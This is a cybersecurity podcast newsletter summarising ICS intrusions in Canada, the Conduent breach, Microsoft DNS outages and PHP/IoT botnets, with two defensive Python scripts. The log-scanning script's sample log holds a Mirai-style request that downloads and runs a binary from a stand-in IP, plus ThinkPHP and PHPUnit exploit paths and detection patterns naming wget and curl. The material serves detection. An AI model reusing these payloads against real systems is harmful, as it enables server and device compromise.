CISO Talk by James Azar
CyberHub Podcast
Safety Over Security: Canadian Water & Energy Facilities Breached, 10M Healthcare Records Exposed, and Why Cloud DNS Failures Smell Fishy

Canadian Critical Infrastructure Breached by Hacktivists, 10 Million Impacted in Healthcare Data Breach, Microsoft DNS Outage Sparks Cloud Reliability Debate, and Chrome 142 Patches 20 Vulnerabilities

Good Morning Security Gang

Our final show of the week! I don’t do shows on Friday, Saturday, or Sunday because, as a full-time CISO, even I need a few days to catch up, touch grass, and reset. Tomorrow, our full weekly recap will hit your inboxes through our CyberHub newsletter, and Saturday’s deep-dive article — The Cybersecurity Job Market: Layoffs, Offshoring, and the Future of the Workforce — drops exclusively at cyberhubpodcast.com.

Now, today’s show is packed: Canadian critical infrastructure gets hit, Microsoft suffers another global DNS meltdown, Chrome patches 20 new vulnerabilities, and the NSA undergoes a leadership reshuffle. So grab your espresso, Security Gang — coffee cup cheers — and let’s jump right into today’s headlines.

Hacktivists Breach Canada’s Water and Energy Facilities

Canada’s cybersecurity authority is warning that hacktivists accessed and tampered with controls at multiple water, energy, and agricultural facilities, triggering false alarms and creating unsafe operating conditions. The attacks exposed weak authentication and internet-facing ICS and OT assets — a dangerous combination.

“In cyber, we have the CIA triad - confidentiality, integrity, and availability - but you add an S to that and it becomes SCIA, because safety trumps it all in power plants and oil and gas environments. When you think about the business impact of breaches in critical infrastructure, it could create not just an availability issue but a real safety issue where people could die because they would react a specific way to an event that could lead to catastrophic loss of life.” James Azar

If you’re operating critical systems:

  • Disconnect ICS and HMI assets from the open internet.

  • Segment the OT network from IT into zones with a controlled DMZ between them, rather than relying solely on a single perimeter firewall.

  • Restrict vendor remote access to a monitored jump host, and require VPN with MFA for every administrative session.

This is a stark reminder that cyberattacks in operational technology aren’t just about downtime — they can be lethal.
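The quickest way to check the first two bullets against what your perimeter actually does is to audit the forwarding rules themselves. The following is an added example, not code from the Canadian advisory or from any vendor: it parses iptables-save style FORWARD rules and flags any ACCEPT that lets traffic from an untrusted interface reach a known ICS/OT or HMI console port. The port table, the interface names (wan0, ppp0, wg0) and the sample rule set are constructed for the example.

```python
import re

# Constructed reference table of ports used by common ICS/OT protocols and
# HMI remote-console services. Extend it for whatever your plant actually runs.
OT_SERVICE_PORTS = {
    102: "Siemens S7comm (ISO-TSAP)",
    502: "Modbus/TCP",
    1911: "Tridium Niagara Fox",
    2222: "EtherNet/IP (explicit messaging)",
    4840: "OPC UA",
    5900: "VNC (common HMI remote desktop)",
    20000: "DNP3",
    44818: "EtherNet/IP",
    47808: "BACnet/IP",
}

# Interfaces that face untrusted networks (assumed names). Traffic arriving
# here and being accepted towards an OT port is the finding we are after.
UNTRUSTED_IFACES = {"wan0", "ppp0"}

# Constructed iptables-save style FORWARD rules for the example. The first two
# are the kind of "convenience" port-forward the advisory warns about; the
# wg0 rule is the same Modbus access but only from the VPN subnet.
SAMPLE_RULES = """
-A FORWARD -i wan0 -d 10.20.5.10 -p tcp --dport 502 -j ACCEPT
-A FORWARD -i wan0 -d 10.20.5.11 -p tcp --dport 5900 -j ACCEPT
-A FORWARD -i wan0 -d 10.0.0.9 -p tcp --dport 443 -j ACCEPT
-A FORWARD -i wg0 -s 10.99.0.0/24 -d 10.20.5.10 -p tcp --dport 502 -j ACCEPT
-A FORWARD -i wan0 -d 10.20.5.12 -p udp --dport 20000 -j DROP
-A FORWARD -i wan0 -m state --state ESTABLISHED,RELATED -j ACCEPT
"""

_FLAGS = {"-A", "-i", "-o", "-s", "-d", "-p", "-j", "--dport", "--sport", "-m", "--state"}


def parse_rule(line):
    """Turn one iptables rule line into a dict of flag -> value."""
    tokens = line.split()
    rule = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in _FLAGS and i + 1 < len(tokens):
            rule[tok] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return rule


def audit_rules(rules_text, untrusted_ifaces=UNTRUSTED_IFACES):
    """Return the ACCEPT rules that expose an OT/HMI port to an untrusted interface."""
    findings = []
    for raw in rules_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        rule = parse_rule(line)
        if rule.get("-j") != "ACCEPT":
            continue                      # DROP/REJECT is the behaviour we want
        if rule.get("-i") not in untrusted_ifaces:
            continue                      # VPN, jump-host or internal interfaces
        dport = rule.get("--dport")
        if dport is None or not dport.isdigit():
            continue                      # stateful or port-less rules
        port = int(dport)
        if port in OT_SERVICE_PORTS:
            findings.append({
                "rule": line,
                "dst": rule.get("-d", "any"),
                "dport": port,
                "service": OT_SERVICE_PORTS[port],
            })
    return findings


if __name__ == "__main__":
    for f in audit_rules(SAMPLE_RULES):
        print(f"EXPOSED {f['service']} on {f['dst']}:{f['dport']}  <- {f['rule']}")
```

Run it against `iptables-save` output (or the equivalent export from your firewall) and every line it prints is a device that should be reachable only through the VPN/jump-host path. Rules for other firewalls need a different parser, but the policy check is the same: untrusted ingress plus OT port plus ACCEPT is a finding.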

Conduent Data Breach Impacts 10 Million Americans

Government IT contractor Conduent disclosed that a January cyber incident impacted over 10 million individuals across multiple U.S. states, exposing Social Security numbers, medical data, and health insurance information.

The breach affects programs such as Medicaid, food assistance, and tolling systems, underscoring how deeply integrated Conduent’s technology is within state infrastructure. Despite generating $754 million in quarterly revenue, Conduent spent only $2 million on remediation — a drop in the bucket considering the magnitude of the exposure.

Citizens should expect phishing campaigns and benefits fraud, while government partners must demand stronger vendor risk transparency and post-breach validation audits for companies managing public systems.

U.S. Insider Sells Cyber Exploits to Russia

In a chilling insider threat case, Peter Williams, 39, pleaded guilty to stealing and selling U.S. cyber exploits to a Russian broker for $1.3 million in cryptocurrency. The Department of Justice says Williams worked at a cyber tools developer and sold at least eight components of offensive software used for national defense.

Let’s call it what it is — treason. These stolen capabilities can be weaponized against U.S. interests, defense contractors, or even civilians. Insider threats remain one of the hardest challenges to defend against. Strict access governance, data tagging, and behavioral analytics for privileged users are essential to preventing the next Williams from cashing in on national secrets.

Microsoft DNS Outage Hits Azure and 365

For the second time in just over a week, Microsoft suffered a DNS outage impacting Azure, the Exchange Admin Center, and Microsoft 365 portals. The disruption stemmed from a misconfiguration in Azure Front Door, the edge service that fronts those portals, so a single bad change cut off access globally.

While Microsoft has implemented a fix, it reignites the debate over cloud vs. on-prem reliability. I’ll say it plainly: moving back on-prem isn’t the solution — resilience is. Redundancy, isolation, and fault-tolerant DNS routing should be foundational.

“Resilience isn’t built in the cloud or on-prem; it’s built in preparation.” James Azar

Still, when both AWS and Azure experience “fat-finger” outages within days of each other, you can’t help but wonder — is it coincidence or coordinated disruption? Either way, resilience planning has never been more critical.

Chrome 142 Patches 20 New Vulnerabilities

Google has released Chrome 142, addressing 20 security flaws, several of them high-severity, on Windows, macOS, and Linux. Other Chromium-based browsers (Edge, Brave, and the like) share the affected code and need their own vendor updates. If you're managing enterprise endpoints, patch now.

These vulnerabilities, some potentially exploitable for remote code execution, are another reminder that browser updates are part of endpoint defense hygiene. Don’t delay patch rollouts in managed environments — every unpatched browser is a potential gateway.

Botnet Surge Targets PHP and IoT Devices

Security researchers are warning about a surge in automated botnets using old Mirai-style tactics to compromise servers running vulnerable PHP frameworks and internet-facing IoT gateways. Attackers are exploiting long-known CVEs in PHPUnit, Laravel, and ThinkPHP, as well as DVR and camera firmware.

To protect against this wave:

  • Patch legacy PHP environments immediately, and strip development tooling such as PHPUnit out of production web roots.

  • Rate-limit and geofence admin panels.

  • Deploy WAF rules for the known exploit paths, and egress-filter web servers so a compromised host cannot fetch payloads or reach C2.

This attack style isn’t new — it’s cyber deja vu — but it’s thriving because of unpatched systems and lazy configurations.
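Because these campaigns reuse the same exploit paths year after year, they are easy to spot in ordinary web server logs before a WAF rule is even written. The following is an added example, not code from the researchers' report: it parses Apache/Nginx combined-format log lines, matches the request path against commonly observed probe signatures for the PHPUnit, ThinkPHP, Laravel and Mirai-style IoT dropper families, and rolls the hits up per source IP so they can feed a block list. The signature list and the sample log lines (TEST-NET addresses) are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Commonly observed probe signatures for the exploit families named in the
# report. Matched against the URL-decoded, lower-cased request path.
SIGNATURES = [
    ("phpunit-rce", re.compile(r"/vendor/phpunit/.*/eval-stdin\.php")),
    ("thinkphp-rce", re.compile(r"invokefunction|\\think\\app")),
    ("laravel-ignition-rce", re.compile(r"/_ignition/execute-solution")),
    ("iot-shell-dropper", re.compile(r"^/shell\?|wget\+http|curl\+http|/bin/busybox")),
]

# Constructed sample log, not a capture from a real host.
SAMPLE_LOG = r'''
203.0.113.7 - - [30/Oct/2025:08:12:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Oct/2025:08:12:02 +0000] "POST /index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [30/Oct/2025:08:13:10 +0000] "POST /_ignition/execute-solution HTTP/1.1" 405 0 "-" "python-requests/2.31"
198.51.100.23 - - [30/Oct/2025:08:13:11 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://198.51.100.23/bins/x86;sh+x86 HTTP/1.1" 404 196 "-" "Hello, world"
192.0.2.44 - - [30/Oct/2025:08:14:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''


def classify(path):
    """Return the signature families a request path matches (URL-decoded first)."""
    decoded = unquote(path).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """Return one finding per (request, family) for log lines that match a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # blank or non-combined-format line
        for family in classify(m["path"]):
            findings.append({
                "ip": m["ip"],
                "family": family,
                "status": int(m["status"]),
                "path": m["path"],
                "ua": m["ua"],
            })
    return findings


def summarize(findings):
    """Map source IP -> set of families probed; every key is a block-list candidate."""
    by_ip = defaultdict(set)
    for f in findings:
        by_ip[f["ip"]].add(f["family"])
    return dict(by_ip)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, families in summarize(hits).items():
        print(ip, sorted(families))
    # A 2xx on an exploit path means the request was handled, not rejected:
    # those are the lines to investigate first.
    for f in hits:
        if 200 <= f["status"] < 300:
            print("INVESTIGATE", f["ip"], f["family"], f["path"])
```

Treat a 404 on these paths as noise worth blocking and a 200 as an incident: a successful `invokefunction` call on an old ThinkPHP install is exactly how these bots get their first foothold. The URL-decoding step matters because scanners routinely percent-encode the backslashes in the ThinkPHP payload.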

Kerberos Reflection Flaw Escalates AD Abuse Risks

Microsoft researchers disclosed a new Kerberos reflection attack chain (CVE-2025-33073) that allows privilege escalation via ghost SPNs: stale service principal names left in the directory for hosts that no longer exist, which an attacker can claim. Combined with earlier Kerberos flaws, this chain enables lateral movement, DNS manipulation, and potential domain takeover.

To mitigate, confine administration to privileged access workstations, alert on new or changed servicePrincipalName values (Directory Service Changes auditing, event ID 5136, records the modification), and run automated privilege-path auditing to find the accounts and SPNs that give an attacker a route to domain control.

MITRE ATT&CK v18 Launches with ICS & Mobile Updates

MITRE has rolled out ATT&CK version 18, which reworks the framework's detection guidance into structured detection strategies and analytics and extends coverage for mobile and industrial control systems (ICS). The updated technique and campaign mappings can be imported into SIEM and SOAR content, helping practitioners close visibility gaps in hybrid IT/OT environments.

If you’re running ICS or mobile-heavy operations, updating your threat detection mappings to ATT&CK v18 is a no-brainer — it’s one of the best blue team resources in our industry.

NSA Leadership Shake-Up Amid Dual-Hat Debate

The NSA is undergoing significant leadership changes, with vacancies in top positions including Director and Deputy General Counsel. The shake-up follows the April removal of key generals amid tension over whether to separate NSA from U.S. Cyber Command — the long-debated “dual-hat” model.

Potential successors include Lt. Gen. Paul Stanton, Lt. Gen. Thomas Hensley, and Maj. Gen. William Hartman, all respected cyber leaders. The agency’s need for stability comes at a critical moment — as threats from China, Russia, and North Korea intensify, the NSA’s direction will shape U.S. cyber defense for the decade ahead.

Action List

  • 🔒 Isolate OT networks — remove internet exposure and enforce MFA where possible.

  • 💼 Audit vendor relationships for data handling and breach transparency (Conduent).

  • 🧑‍💻 Harden insider threat programs — enforce least privilege and behavioral monitoring.

  • 🌐 Update Chrome (and other Chromium-based browsers) to 142, and patch exposed PHP frameworks and IoT firmware immediately.

  • ☁️ Review cloud redundancy plans — DNS misconfigs should never cripple production.

  • ⚙️ Deploy MITRE ATT&CK v18 mappings into SIEM/SOAR pipelines.

  • 🔑 Audit AD and Kerberos configurations for SPN manipulation and ghost SPNs.

  • 🧠 Stay informed — your best defense starts with awareness, not reaction.


James Azar’s CISO’s Take

Today’s stories perfectly capture the intersection of technology, trust, and safety. The Canadian ICS breach is every CISO’s nightmare — a reminder that cybersecurity isn’t just digital; it’s physical, human, and life-impacting. Meanwhile, Microsoft’s DNS chaos and the Chrome patch cycle prove that reliance on automation without redundancy is a risk multiplier, not a time-saver.

My biggest takeaway? Whether it’s critical infrastructure or SaaS, the fundamentals haven’t changed — visibility, segmentation, and resilience are what keep businesses (and people) safe. We can’t automate accountability, and we can’t outsource trust. This week reminded me that security leadership isn’t about chasing every threat — it’s about ensuring every layer of defense serves a purpose.

“Don’t believe everything you see online - everything you see online is just a magnitude, a small micro percentage that’s not even a sample size of what real life is all about. Every now and then, get out, touch grass, enjoy it. The threats will still be there when you get back, but connecting with real people and real life makes us better equipped to face them.” James Azar

Stay caffeinated, stay vigilant, and as always — stay cyber safe.
